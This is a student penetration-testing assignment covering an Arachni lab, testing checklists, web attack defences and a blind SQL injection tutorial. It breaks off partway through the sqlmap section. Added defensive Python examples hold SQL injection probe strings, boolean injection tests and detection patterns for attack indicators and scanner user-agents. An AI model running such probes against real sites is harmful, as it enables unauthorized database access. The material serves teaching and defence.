
GROUP ASSIGNMENT

Name and TP Number: Jin Hao (TP035111)
                    Lin Siong Jie (TP032265)
                    Sivanandha Muthamil Selvam (TP038986)

Intake code: UC3F17102IT (ISS)

Module name: Penetration Testing

Module code: CT086-3-3-PNT

Lecturer's Name: Dr. Maryam Shahpasand

Hand in date: 16th June, 2017
Table of Contents
Task 1 – Group Part...................................................................................................................4

Task 2 – Individual...................................................................................................................11

Sivanandha TP038986.............................................................................................................11

2.1 Grey box penetration testing on web application using arachni.................................................11


Why Gray Box Testing..................................................................................................................11
How to Protect Against Web Application Attacks...........................................................12

Lin Siong Jie TP032265...........................................................................................................15

2.2 White Box Testing.....................................................................................................................15


Jin Hao TP035111....................................................................................................................20

2.3 Black Box Testing..............................................................................................................20

Task 3 – Group Part.................................................................................................................24

3.1 Introduction..............................................................................................................................24
3.2 How Websites Get Hacked.......................................................................................................25
3.2.1 Scenario..................................................................................................................................26
3.3 Impact of the selected technique/tool/framework on the security..........................................27
3.4 General functionality of sqlmap.................................................................................................28
3.5 Step by step tutorial on how to use SQLMAP tool in Kali Linux................................................29
3.6 Countermeasure the sqlmap attack...........................................................................................35
3.7 Conclusion.................................................................................................................................36
Task 4 – Individual Part...........................................................................................................37

Sivanandha – TP038986..........................................................................................................37

Title: STUDY ON SQL INJECTION ATTACKS: MODE, DETECTION AND PREVENTION.............37

Objective.........................................................................................................................................37
Finding outcomes............................................................................................................................38
Impact of research in sql injection...........................................................................................40

Methodology and Techniques.........................................................................................................40


Future works and Recommendation................................................................................................41

Lin Siong Jie TP032265...........................................................................................................42

Jin Hao TP035111....................................................................................................................45

References................................................................................................................................50

Task 1 – Group Part
1. Application

The application that this lab is going to be built around is called “Arachni”. Arachni is designed
mainly for web application security, but it can also be used as a general-purpose scraping or
testing framework. It is a full-featured, modular, high-performance Ruby framework designed to
help penetration testers and administrators evaluate the security of web applications, which makes
it a good fit for a test lab. It is “smart”: it trains itself automatically by learning from the HTTP
responses it receives during the audit process. Unlike other scanners, Arachni takes into account
the dynamic nature of web applications and can detect changes caused while travelling through
the paths of a web application, so it can handle attack or input vectors that would otherwise be
undetectable by non-humans. Finally, Arachni performs well thanks to its asynchronous HTTP
model (courtesy of Typhoeus); the only limits are the responsiveness of the server under audit and
the bandwidth that is available.

2. Architecture

Nowadays a penetration testing lab can have many different architectures, because each one is
customised to a particular company's needs. All of them, however, are derived from the same
basic architecture, with more or less complexity added depending on the tester's skills. This
section explains the basic lab set-up and its architecture first, and then a more complex one of the
kind often implemented in a medium-sized organisation.

In the simple testing lab architecture, the minimum requirement is two machines, which is the
smallest number of virtual machines a testing lab can have: one simulates the attacker and the
other is used as the target machine. The virtual machines run under virtualisation software and are
installed with operating systems such as Windows XP, macOS or Linux. Once this requirement is
fulfilled, we can diagram the lab set-up or add more complexity.

In this simple testing lab, a small network is built on the target machine's side, which can
represent a small business. A firewall sits between the target machine and the attacker and
defends against the attacks that are launched during the penetration test. For network
infrastructure such as switches, Cisco VIRL, a network simulation tool, is provided as well to
emulate the network security.

1. Propose a general architecture of penetration testing lab

This complex testing lab architecture builds on the simple one. It is designed to resemble a
real-world environment by adding a layered security approach; as the tester's skill level increases,
more layers of security can be added to the lab. In this diagram there is a DMZ tier holding the
Internet-facing servers and an internal network containing the internal VMs and servers. The
DMZ is configured to allow only certain traffic from some of the DMZ servers to the internal
servers. Domain policies are designed as well in order to provide additional layers of security.
Lastly, a Cisco firewall is implemented and configured in the most restrictive manner, requiring
specific IP addresses and port numbers for connectivity.

Types of Software that is needed to set up a penetration testing lab

Nowadays, setting up a penetration testing lab looks like an easy task for a penetration tester, but
the tester needs the right tools and software to start one. Many tools are available, and not all of
them are helpful to a penetration tester. In this assignment we use the following tools to set up
the penetration testing lab.

VMware

- VMware is a virtualization and cloud computing software provider based in Palo Alto,
California.

- The penetration tester will be using VMware Workstation as the virtual lab for the penetration
testing lab.

- It lets the penetration tester test for vulnerabilities on different operating systems.

Kali Linux

- Kali Linux is an open source project that is maintained and funded by Offensive Security, a
world-class information security training and penetration testing services company.

- Kali Linux has some requirements for installing the system:

• Minimum of 10GB hard disk space for installation

• Minimum of 512MB RAM for i386 and AMD64 architectures

• Bootable CD-DVD drive or a USB stick

- Kali Linux has many well-known security tools such as Nmap, Aircrack-ng, Wireshark,
John the Ripper and more.

- Penetration testers are able to make full use of it to conduct penetration testing with the useful
tools that Kali Linux provides.

Arachni

- Arachni is an open source, feature-full, modular, high-performance Ruby framework aimed
towards helping penetration testers and administrators evaluate the security of web
applications.

- The penetration tester will be using the Arachni application for setting up the penetration
testing lab.

Specific configuration and steps to build the penetration testing lab

Step 1

Figure 1: Shows the TCP listener and the port number on the machine that has been activated.

Step 2

Figure 2: Shows the login GUI of Arachni v1.5.1.

Step 3

Figure 3: After the login is done, the main page is loaded.

Step 4

Figure 4: Shows the main page where the data for the attack is entered.

Step 5

Figure 5: Shows the page after the data and the URL of the target page have been typed into the
respective boxes.

Step 6

Figure 6: Shows the scan result for the web page that was scanned to identify the vulnerabilities
in the web server.

Step 8

Figure 8: Shows the part of the web page that had the loophole in the server.

Task 2 – Individual

Sivanandha TP038986
2.1 Grey box penetration testing on web application using arachni
Grey box testing is the combination of the white box and black box testing techniques. In white
box testing the testers know the internal structure of the code, whereas in black box testing the
testers are not aware of the internal structure of the program. [ CITATION Gur08 \l 1033 ]

Grey box penetration testing of a web application using Arachni is one of the best ways to find
vulnerabilities in a website, because the scanner reports each error in detail and shows the
pen-tester which part must be fixed, so the vulnerabilities in the web application can be patched.

Grey box testing is a method of testing an application with limited knowledge of its inner
workings. Grey box testing is often used to test web services applications, and it is performed by
end users as well as by testers and developers.

Why Gray Box Testing

Gray Box Testing is performed for the following reasons:

• It provides the combined benefits of both black box testing and white box testing
• It combines the input of developers as well as testers and improves overall product quality
• It reduces the overhead of the long process of testing functional and non-functional types
• It gives developers enough free time to fix defects
• Testing is done from the user's point of view rather than the designer's point of view

How to Protect Against Web Application Attacks

SQL injection

SQL injection attacks are when an attacker uses a web form field or URL parameter to gain
access to or manipulate your database. When you use standard Transact-SQL it is easy to
unknowingly insert rogue code into your query that could be used to change tables, get
information and delete data. You can easily prevent this by always using parameterized queries;
most web languages have this feature and it is easy to implement.

Use SSL.

Use an encrypted SSL protocol to transfer users' personal information between the website and
your database, which will avoid the information being read in transit without the proper
authority.

XSS

Cross-site scripting (XSS) attacks inject malicious JavaScript into your pages, which then runs in
the browsers of your users, and can change page content or steal information to send back to the
attacker. For example, if you show comments on a page without validation, then an attacker might
submit comments containing script tags and JavaScript, which could run in every other user's
browser and steal their login cookie, allowing the attacker to take control of the account of every
user who viewed the comment. You need to ensure that users cannot inject active JavaScript
content into your pages.

Back up frequently.

In case of any hacks happening, keep everything backed up. Back up on-site, back up off-site,
back up everything multiple times a day. Every time a user saves a file it should automatically
back up in multiple locations.

Web Application Penetration Testing Checklist

Task White Box Grey Box Black Box

Information Gathering x x x

Authentication testing x x x

Fingerprint web application x x x

Crawl Website x

Directory traversal Attack x x

Vulnerability scanning x x x

Performing HTTP response splitting attack x x x

Brute force SSH, FTP, and other services login credentials x

Perform session hijacking x x x

Performing MITM attack x x x

Examine the web server logs x x x

Explanation

1. Performing web application authentication testing: use social engineering techniques to
collect information about Human Resources, contact details and other social information.
2. Gathering information about the target: use WHOIS database query tools to get details such
as the domain name, IP address, administrative details, autonomous system number, DNS, etc.
3. Fingerprint the web application to gather information such as the server name, server type,
operating system and applications running on the server; use fingerprinting tools such as
Netcraft, httprecon and IDServe.
4. Crawl the website to gather specific information from web pages, such as email addresses.
5. Enumerate web server directories to extract important information about web
functionalities, login forms, etc.
6. Perform a directory traversal attack to access restricted directories and execute commands
from outside the web server root directories.
7. Perform vulnerability scanning to identify weaknesses in the network; use vulnerability
scanning tools such as HP WebInspect and Nessus, and determine if the system can be
exploited.

Lin Siong Jie TP032265
2.2 White Box Testing

As an ethical hacker, he/she has full knowledge of the whole infrastructure of the network. The
ethical hacker needs to make sure the web application is secure from intruders. Here are some
steps to stop intruders from hacking the web application.

• Update the web application software with the latest patches
• Configure the software in as secure a fashion as possible
• Implement proper human-resource requirements for deploying and operating a secure web
application
• Install safeguards at the various points of entry into the application
• Organizations should monitor log files

How to Protect Against Web Application Attack

Here is a list of some of the most common types of web application threats, and a few tips on
what you can do to help keep the organization's business secure from each of them.

Four of the most common web application threats are:

• Cross site scripting (XSS)

• SQL injection

• DDoS attacks

• Cookie poisoning

Cross-Site Scripting(XSS)

Cross-site scripting (XSS) is regarded as the most common type of computer security
vulnerability, with a huge number of the web applications online today being vulnerable to this
type of malicious script. XSS allows attackers to inject client-side script into web pages viewed
by other users. A cross-site scripting vulnerability may be used by attackers to bypass access
controls, which could cause serious problems for users.

Prevention: The best solution is to install an intelligent web application firewall (WAF). A WAF
filters, monitors and blocks HTTP traffic to and from a web application. It differs from a regular
firewall in that it can filter the content of specific web applications, whereas regular firewalls
serve as a safety gate between servers. By inspecting HTTP traffic, a WAF can prevent attacks
stemming from web application security flaws such as SQL injection, cross-site scripting (XSS)
and security misconfigurations.

SQL Injection

SQL injections are one of the most serious types of attack on the internet. These attacks take
advantage of web application vulnerabilities to gain control of databases and all of the
information contained within them. Any web application which stores data will use one or more
databases to hold that information and recall it when necessary. This could be things such as
names, email addresses, postal addresses, telephone numbers, credit card details, bank
information and much more.

Prevention: The most important precautions are data sanitization and validation, which should
already be in place. Sanitization usually involves running any submitted data through a function
(such as MySQL's mysql_real_escape_string() function) to ensure that dangerous characters (like
the single quote, ' ) are not passed to a SQL query in data. Validation is slightly different, in that
it attempts to ensure that the data submitted is in the form that is expected. At the most basic level
this includes ensuring that email addresses contain an “@” sign, that only digits are supplied
when integer data is expected, and that the length of a piece of data submitted is not longer than
the maximum expected length.

DDoS Attack

DoS stands for denial-of-service; the form more commonly seen today is the distributed
denial-of-service (DDoS) attack. This type of attack is an attempt to make a machine or network
resource unavailable to its intended users. It can make your website run unbearably slowly or, in
the worst case, take it offline completely. Several large corporate and even government websites
have been hit by DDoS attacks in the past.

Prevention: Assure your scalability. Scaling the analytics infrastructure is also an important
consideration. Flow technology scales rather well, but at a massive cost: it compromises
granularity and time to mitigate. The multi-vector attack trend illustrates the importance of
validating performance. A basic attack such as a SYN flood puts a base stress level onto the
CPUs; simultaneously fighting a more complex application-layer attack such as an HTTP GET
flood could push a system over its limit.

Cookie poisoning

On the web, cookie poisoning is the modification of a cookie (personal information stored on a
web user's computer) by an attacker to gain unauthorized information about the user for purposes
such as identity theft. The attacker may use the information to open new accounts or to gain
access to the user's existing accounts.

Prevention: Clearing stored cookies from your browser regularly will ensure that there is nothing
for anybody to hijack. Always avoid signing up for sites or newsletters that you don't trust or
won't use again. Regular virus and malware scanning is also advised to help you keep your
browser free from any malicious scripts which could be hijacking your cookies. MalwareBytes is
the software I use to keep my PC clean and free of malware; I use the free version and it has
always done a remarkable job.
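
The advice above is client-side; on the server, the usual mitigation against cookie modification is integrity protection. The following Python script is an added example (not from the assignment or any tool it names) that signs a session cookie with HMAC-SHA256 so that a poisoned copy is rejected, and emits the Set-Cookie attributes that keep the cookie away from page scripts and plaintext transport. The key, the session payload and the helper names are constructed for this example.

```python
import base64
import hashlib
import hmac
import json

# Assumption: a server-side secret generated once per deployment and kept out of
# source control. This constructed value exists only so the example runs offline.
SERVER_KEY = b"constructed-demo-key-replace-in-production"


def _b64url(data: bytes) -> str:
    """URL-safe base64 without padding, safe to place in a cookie value."""
    return base64.urlsafe_b64encode(data).decode("ascii").rstrip("=")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_cookie(payload: dict, key: bytes = SERVER_KEY) -> str:
    """Serialise the session payload and append an HMAC-SHA256 tag.

    The browser can still read the payload, but any change to it invalidates the tag.
    """
    body = _b64url(json.dumps(payload, sort_keys=True).encode("utf-8"))
    tag = hmac.new(key, body.encode("ascii"), hashlib.sha256).hexdigest()
    return f"{body}.{tag}"


def verify_cookie(cookie: str, key: bytes = SERVER_KEY):
    """Return the payload if the tag is valid, otherwise None (treat as logged out)."""
    body, sep, tag = cookie.rpartition(".")
    if not sep or not body:
        return None
    expected = hmac.new(key, body.encode("ascii"), hashlib.sha256).hexdigest()
    # Constant-time comparison so the check does not leak how many bytes matched.
    if not hmac.compare_digest(expected, tag):
        return None
    try:
        return json.loads(_b64url_decode(body))
    except (ValueError, UnicodeDecodeError):
        return None


def poisoned_copy(cookie: str, new_payload: dict) -> str:
    """Model what a cookie-poisoning attempt yields: a rewritten payload with the old tag."""
    _body, _sep, tag = cookie.rpartition(".")
    return f"{_b64url(json.dumps(new_payload, sort_keys=True).encode('utf-8'))}.{tag}"


def set_cookie_header(name: str, value: str) -> str:
    """Set-Cookie attributes that block script access and plaintext transport of the cookie."""
    return f"Set-Cookie: {name}={value}; Path=/; HttpOnly; Secure; SameSite=Strict"


if __name__ == "__main__":
    issued = sign_cookie({"user": "bob", "role": "user"})
    print(set_cookie_header("session", issued))
    print("valid  :", verify_cookie(issued))
    print("forged :", verify_cookie(poisoned_copy(issued, {"user": "bob", "role": "admin"})))
```

The payload is deliberately not encrypted: the point being made is that the user can see the role but cannot change it, and the HttpOnly flag is what stops the XSS case described earlier (a script reading the login cookie) from reaching this value at all.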


Web Application Penetration Testing Checklist

Task White Box Grey Box Black Box

Information Gathering x x

Authentication testing x x

Fingerprint web application x x

Crawl Website x

Directory traversal Attack x

Vulnerability scanning x x

Performing HTTP response splitting attack x x

Brute force SSH, FTP, and other services login credentials x

Perform session hijacking x x

Performing MITM attack x x

Examine the web server logs x x

Explanation

8. Performing web application authentication testing: use social engineering techniques to
collect information about Human Resources, contact details and other social information.
9. Gathering information about the target: use WHOIS database query tools to get details such
as the domain name, IP address, administrative details, autonomous system number, DNS, etc.
10. Fingerprint the web application to gather information such as the server name, server type,
operating system and applications running on the server; use fingerprinting tools such as
Netcraft, httprecon and IDServe.
11. Crawl the website to gather specific information from web pages, such as email addresses.
12. Enumerate web server directories to extract important information about web
functionalities, login forms, etc.
13. Perform a directory traversal attack to access restricted directories and execute commands
from outside the web server root directories.
14. Perform vulnerability scanning to identify weaknesses in the network; use vulnerability
scanning tools such as HP WebInspect and Nessus, and determine if the system can be
exploited.
15. Perform a cache poisoning attack to force the web server's cache to flush its actual cache
content, and send a specifically crafted request which will be stored in the cache.
16. Perform an HTTP response splitting attack to pass malicious data to a vulnerable
application that includes the data in an HTTP response header.
17. Brute force SSH, FTP and other services' login credentials to gain unauthorized access.
18. Perform session hijacking to capture valid session cookies and IDs; use tools such as
Burp Suite, Firesheep and jhijack to automate session hijacking.
19. Perform a MITM attack to access sensitive information by intercepting and altering the
communications between the end users and web servers.
20. Use tools such as Webalizer and AWStats to examine the web server logs.
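
Item 20 is the one step in this checklist that is purely defensive, so here is an added example of what examining the logs can look like in practice. The Python script below is not part of the assignment and is not Webalizer or AWStats: it parses Apache combined-format access log lines and flags requests whose decoded query string carries SQL injection indicators, or whose User-Agent names a known scanner. The four log lines, the documentation address ranges, the user-agent strings and the indicator list are all constructed for this example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed Apache "combined" log lines for the demo (not real traffic);
# 203.0.113.0/24 and 198.51.100.0/24 are documentation address ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Jun/2017:10:01:02 +0800] "GET /listproducts.php?cat=1 HTTP/1.1" 200 4213 "-" "Mozilla/5.0"
203.0.113.5 - - [16/Jun/2017:10:01:03 +0800] "GET /listproducts.php?cat=1%27%20AND%20SLEEP%285%29--%20 HTTP/1.1" 200 4213 "-" "sqlmap/1.1.6#stable (http://sqlmap.org)"
198.51.100.7 - - [16/Jun/2017:10:02:10 +0800] "GET /listproducts.php?cat=1%20UNION%20SELECT%201%2C2%2C3-- HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [16/Jun/2017:10:03:44 +0800] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Indicators checked against the URL-decoded query string, as (label, regex) pairs.
SQLI_INDICATORS = [
    ("quote-boolean", re.compile(r"'\s*(or|and)\s", re.I)),
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("time-delay", re.compile(r"\b(sleep|benchmark|waitfor)\b", re.I)),
    ("sql-comment", re.compile(r"--\s*$|/\*")),
]
SCANNER_AGENTS = ("sqlmap", "nikto", "arachni")


def parse_line(line: str):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry: dict) -> list:
    """Labels describing why an entry looks like an SQL injection probe (empty if clean)."""
    reasons = []
    _path, _sep, query = entry["target"].partition("?")
    decoded = unquote_plus(query)  # decode %27, %20, + ... before matching
    for label, pattern in SQLI_INDICATORS:
        if pattern.search(decoded):
            reasons.append(label)
    agent = entry["agent"].lower()
    if any(name in agent for name in SCANNER_AGENTS):
        reasons.append("scanner-user-agent")
    return reasons


def scan_log(text: str) -> list:
    """Run every line through the indicators; return suspicious entries with their reasons."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            findings.append({"ip": entry["ip"], "time": entry["time"],
                             "target": unquote_plus(entry["target"]), "reasons": reasons})
    return findings


def hits_per_ip(findings: list) -> dict:
    """Count suspicious requests per source address, the usual pivot for triage or blocking."""
    return dict(Counter(f["ip"] for f in findings))


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["target"], ", ".join(f["reasons"]))
    print(hits_per_ip(scan_log(SAMPLE_LOG)))
```

On a real server the same functions would be fed the live access log; the point of decoding the query string before matching is that probes arrive percent-encoded, so indicators matched against the raw line would miss them.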

Jin Hao TP035111
2.3 Black Box Testing
Black box testing is a testing methodology in which, for a web application, the application itself
is treated as a whole, without analysing its structure and internal logic. Web application scanners
typically check whether the web application as a whole could be manipulated to gain access to
the database.

How to Protect Against Web Application Attack


Nowadays, securing a company's web applications is the aspect most easily ignored when
securing the enterprise. According to (acunetix, 2017), hacking is increasing, with as many as
75% of cyber-attacks done through the web and via web applications. Most corporations have
secured their data at the network level, but have overlooked the crucial step of checking whether
their web applications are vulnerable to attack. The following are some methods to avoid and
stop intruders from hacking the web application.
1. Stay updated.
Stay up to date with hacking threats by following tech news, and keep the software updated as
well.
2. Toughen up access control.
The admin level of the website is very important, and it could be very easy to access. Therefore,
enforce user names and passwords that are hard to guess, and change the default database prefix
to something random and harder to guess.
3. Increase staff security awareness.
Computer users in the office might provide easy access to the website servers. Therefore,
implement proper human-resource requirements for deploying and operating a secure web
application, and provide training in basic security knowledge to increase the staff's security
awareness.
4. Increase security levels.
Make sure that logins expire after a short period of inactivity, that passwords are strong enough
and are changed frequently, and that all devices plugged into the network are scanned for
malware each time they are attached.
5. Install a web application firewall.

A web application firewall (WAF) can be software or hardware based; it sits between the
website server and the data connection and reads every bit of data passing through it.

6. Install security applications.


While not as effective as a full-blown WAF, there are some free and paid-for security
applications available. Netsparker (a free community edition and a trial version are available) is
good for testing for SQL injection and XSS. OpenVAS claims to be the most advanced open
source security scanner; it is good for testing known vulnerabilities and currently scans for over
25,000 of them. SecurityHeaders.io (a free online check) is a tool that quickly reports which
security headers (such as CSP and HSTS) a domain has enabled and correctly configured. The
Xenotix XSS Exploit Framework is a tool from OWASP (Open Web Application Security
Project) that includes a huge selection of XSS attack examples, which you can run to quickly
confirm whether your site's inputs are vulnerable in Chrome, Firefox and IE.
7. SQL injection
SQL injection attacks are when an attacker uses a web form field or URL parameter to gain
access to or manipulate your database. When you use standard Transact-SQL it is easy to
unknowingly insert rogue code into your query that could be used to change tables, get
information and delete data. You can easily prevent this by always using parameterized queries;
most web languages have this feature and it is easy to implement.
9. Use SSL.
Use an encrypted SSL protocol to transfer users' personal information between the website and
your database, which will avoid the information being read in transit without the proper
authority.
10. XSS
Cross-site scripting (XSS) attacks inject malicious JavaScript into your pages, which then runs in
the browsers of your users, and can change page content or steal information to send back to the
attacker. For example, if you show comments on a page without validation, then an attacker might
submit comments containing script tags and JavaScript, which could run in every other user's
browser and steal their login cookie, allowing the attacker to take control of the account of every
user who viewed the comment. You need to ensure that users cannot inject active JavaScript
content into your pages.
11. Back up frequently.
In case of any hacks happening, keep everything backed up. Back up on-site, back up off-site,
back up everything multiple times a day. Every time a user saves a file it should automatically
back up in multiple locations.
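
As an added example (not code from the assignment or from any tool it names), the following Python script places the concatenated query from item 7 beside its parameterized form, applies output encoding to the comment-display case from item 10, and carries out the validation checks described in the white box section (an “@” in email addresses, digits only when an integer is expected, a maximum length). The in-memory table, the sample users, the probe string and the helper names are constructed for this example; the same passages in the grey box section earlier describe the same two attacks.

```python
import html
import re
import sqlite3


def build_demo_db() -> sqlite3.Connection:
    """Constructed demo table standing in for the site's user database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (email, role) VALUES (?, ?)",
        [("alice@example.com", "admin"), ("bob@example.com", "user")],
    )
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, email: str) -> list:
    """The 'before' form: the form field is concatenated into the SQL text, so the
    database cannot tell data from code."""
    sql = "SELECT id, email, role FROM users WHERE email = '" + email + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn: sqlite3.Connection, email: str) -> list:
    """Parameterized query: the value is bound separately and is never parsed as SQL."""
    return conn.execute(
        "SELECT id, email, role FROM users WHERE email = ?", (email,)
    ).fetchall()


def render_comment(comment: str) -> str:
    """Output encoding for the comment-display case: special characters become
    entities, so a submitted <script> tag is shown as text instead of executed."""
    return '<p class="comment">' + html.escape(comment, quote=True) + "</p>"


EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


def validate_email(value: str, max_len: int = 254) -> bool:
    """Validation: expected shape (contains '@') plus an upper bound on length."""
    return len(value) <= max_len and EMAIL_RE.fullmatch(value) is not None


def validate_integer(value: str, max_len: int = 10) -> bool:
    """Validation: only digits when an integer is expected, and a bounded length."""
    return 0 < len(value) <= max_len and value.isdigit()


if __name__ == "__main__":
    db = build_demo_db()
    probe = "' OR '1'='1"  # tautology a form field might carry
    print("concatenated :", find_user_vulnerable(db, probe))  # every row leaks
    print("parameterized:", find_user_safe(db, probe))        # no such email: []
    print(render_comment("<script>alert(1)</script>"))
    print(validate_email("alice@example.com"), validate_email(probe))
    print(validate_integer("42"), validate_integer("42 OR 1=1"))
```

Validation rejects the probe before it reaches the database, the parameterized query makes it harmless even if validation is skipped, and output encoding covers the case where stored data is later rendered into a page; the three are layered rather than alternatives.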

Web Application Penetration Testing Checklist

Task White Box Grey Box Black Box

Information Gathering x x

Authentication testing x x

Fingerprint web application x x

Crawl Website x

Directory traversal Attack x

Vulnerability scanning x x

Performing HTTP response splitting attack x x

Brute force SSH, FTP, and other services login credentials x

Perform session hijacking x x

Performing MITM attack x x

Examine the web server logs x x

Explanations: Why Black box

1. Black box testing is very efficient and well suited for large code segments or units.
2. Black box testing is unbiased: it clearly separates the user's perspective from the
developer's perspective through the separation of QA and development responsibilities.
3. Black box testing is non-intrusive, which means that code access is not required.
4. It is very easy to execute, and the tester can be non-technical. It can be scaled to a large
number of moderately skilled testers with no knowledge of the implementation,
programming language, operating systems or networks.
5. It is used to verify contradictions between the actual system and the specifications.
6. Test cases can be designed immediately after the specifications are complete.
7. Black box tests are reproducible.
8. The environment the program is running in is also tested.
9. The invested effort can be used multiple times.
10. It is more effective on larger units of code than glass box testing.
11. The tester needs no knowledge of the implementation, including specific programming
languages.
12. Tests are done from a user's point of view.
13. It will help to expose any ambiguities or inconsistencies in the specifications.
14. It is efficient when used on larger systems.
15. As the tester and developer are independent of each other, the test is balanced and
unprejudiced.
16. The tester does not need detailed functional knowledge of the system.
17. Tests are done from an end user's point of view, because the end user has to accept the
system. (This is the reason this testing technique is sometimes also called acceptance
testing.)
18. Testing helps to identify vagueness and contradictions in the functional specifications.
19. Test cases can be designed as soon as the functional specifications are complete.

Task 3 – Group Part
3.1 Introduction
According to [ CITATION TON15 \l 17417 ], in 2014 the number of websites on the internet
reached 1 billion. Today it is hovering somewhere in the neighbourhood of 944 million due to
websites going inactive, and it is expected to normalise again at 1 billion sometime in 2015.
Another shocking statistic is that Google, one of the most popular search engines in the world,
quarantines roughly 10,000 websites a day by means of its Safe Browsing technology. From our
own analysis, out of the large number of sites that pass through our scanning technology, around
2–5% of them have some Indicator of Compromise (IoC) that signifies a site attack. Granted, this
may be somewhat high, as the sites being scanned are often already suspected of having an issue,
so to be conservative we would extrapolate that to suggest around 1% of the total sites online are
hacked or infected. To put that into perspective, we are talking about something like 9 million
sites that are currently hacked or infected.

With this kind of impact, it is only natural that people are interested in how websites keep getting
hacked. The challenge is that the answer has been the same for a long while.

In the previous month I started a series of articles on different aspects of website hacks and
infections: Websites get Hacked, and the various motivations behind them, along with The
Impacts of a Hacked Website, where we looked at what the ramifications of a hack were to
website owners of all sizes. Today, we'll take a moment to understand the How.

It is the one question that practically every website security professional gets at some point in
their career, and sometimes over and over. As professionals, we take for granted the knowledge
we have gained over the years and forget what it is like not to know.

Websites get hacked because of three things:

• Access Control
• Software Vulnerabilities
• Third-party Integrations

3.2 How Websites Get Hacked

According to [ CITATION TON15 \l 17417 ], what I find interesting about website hacks is that
they generally come down to the same components regardless of the organisation's size. It
doesn't matter if you are a Fortune 500 company or a small business selling cupcakes. The main
difference is the why.

In large organisations it is often because they failed: they knew exactly what the risk was, but
they never thought it would extend to their websites, the normal response being “I thought
someone else was taking care of it”. With small organisations it is often “Why would anybody
want to hack me? I never knew it would be an issue for me; I'm not Target, I don't have credit
card data”. Around 95 percent of websites still cannot recognise an attack that happens to them.
These software vulnerabilities extend beyond the website itself and easily seep into the different
technologies we discussed above (i.e., web server, infrastructure, and so on). Anywhere there is
a system, there is a potential software vulnerability waiting to be abused. This can also extend to
your browser (i.e., Chrome, Internet Explorer, Firefox, and so forth).

3.2.1 Scenario
Kali Linux is an open-source, Debian-based security distribution maintained by security
professionals. It is intended both as an educational tool and as
a toolbox for network administrators who wish to secure a private or corporate network, or
to test a supposedly 'secured' network.

Assume that you are an EHIR student and the lecturer has given you the task of hacking a website using
sqlmap. What you need is a website which is vulnerable to SQL injection but
does not show error messages: a site which can be attacked, but not with the
classical, error-based techniques. The site will not give any obvious response to our attacks, which is why
this is called a blind SQL injection. It is hard to know whether we are doing it right or not.

Now there is a problem. Blind SQLi is quite time consuming. One first tries the classical
attacks, and only if they fail proceeds to blind SQLi. I cannot find a website which
would not mind being attacked and exposed in public, so I will have to use the same old
testphp.vulnweb.com website. The URL we are going to attack is vulnerable to classical
SQLi. However, we are going to assume that it is not, and attack it without using any of the
methods from the previous SQLi tutorial. That being said, blind SQLi involves a lot of
guessing, and the fact that union-based injection (the classical injection we did
already) could be used to find out table names and so on makes it much easier to write the tutorial.

The first task is to find out whether the target is vulnerable or not. Ideally, one would
append a single quote (') to the parameter to check whether the target is vulnerable to classical
injection, and only if it is not proceed to blind SQLi. In our case, the target is indeed vulnerable to classical
injection, since we see a database error when we append a quote to the URL. For the sake of
learning, we will ignore this fact and proceed with blind SQLi, assuming from now on
that there will be no error messages whatsoever to aid our attack. In that situation the test is
boolean: send the same parameter with a condition that is always true (id=1 AND 1=1) and one that
is always false (id=1 AND 1=2); if the first returns the normal page and the second does not, the
parameter is injectable.

3.3 Impact of the selected technique/tool/framework on the security


Financial Losses
According to the website [ CITATION Sar16 \l 17417 ], every year reports of hacked businesses
reveal staggering financial losses. In 2011, Sony lost $170 million due to a hack of
its PlayStation Network. Also in 2011, CitiGroup lost $2.7 million and AT&T lost $2 million
as a result of hackers. The cost of patching the holes in security, repaying customer losses,
addressing lawsuits and weathering shutdowns of their systems contributed to those huge
numbers. Even for an individual who loses his credit card information to a hacker,
the cost of repairing the damage and tracking down the culprit can be significant.

Loss of Information

Hacking often results in a loss of data due to files being deleted or changed. Customer
information and order information can be stolen and deleted, or a leak of top secret
information could cause real-world security issues. Servers at the Pentagon, FBI, Interpol and
NASA have all been compromised at various points in the past ten years. Sometimes, these
hackers even post information from these governmental organizations online, which could in
theory cause unrest between countries.[ CITATION Sar16 \l 17417 ]

Decreased Privacy

When hackers gain access to your computer, they can see everything. Since much of the
personal, professional and financial parts of our lives have moved online, we risk losing
much more than money or information. Because of the Internet, privacy is limited, usually by
choice. A hacker with access to your email, social networking accounts and personal photos
can very quickly destroy that privacy.[ CITATION Sar16 \l 17417 ]

Damaged Reputation

Companies that get hacked have a bigger problem than just paying for the initial damage
costs and lawsuits. Reputation damage can be devastating to a company's fortunes. If a bank
has been compromised multiple times, customers are less likely to give them their personal
information. The same goes for retailers who lose information to hackers. These companies
lose business over time because of damaged or weakened reputations. Individuals with stolen
identities as a result of hacking have a similar reputation problem when it comes to their
credit ratings.[ CITATION Sar16 \l 17417 ]

3.4 General functionality of sqlmap


According to this website [ CITATION Ber16 \l 17417 ], sqlmap is an open source penetration testing
tool that automates the process of detecting and exploiting SQL injection flaws
and taking over database servers. It comes with a powerful detection engine,
many niche features for the ultimate penetration tester and a broad range of switches,
from database fingerprinting, over data fetching from the database, to
accessing the underlying file system and executing commands on the operating system via
out-of-band connections.

• Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft
Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB and HSQLDB database
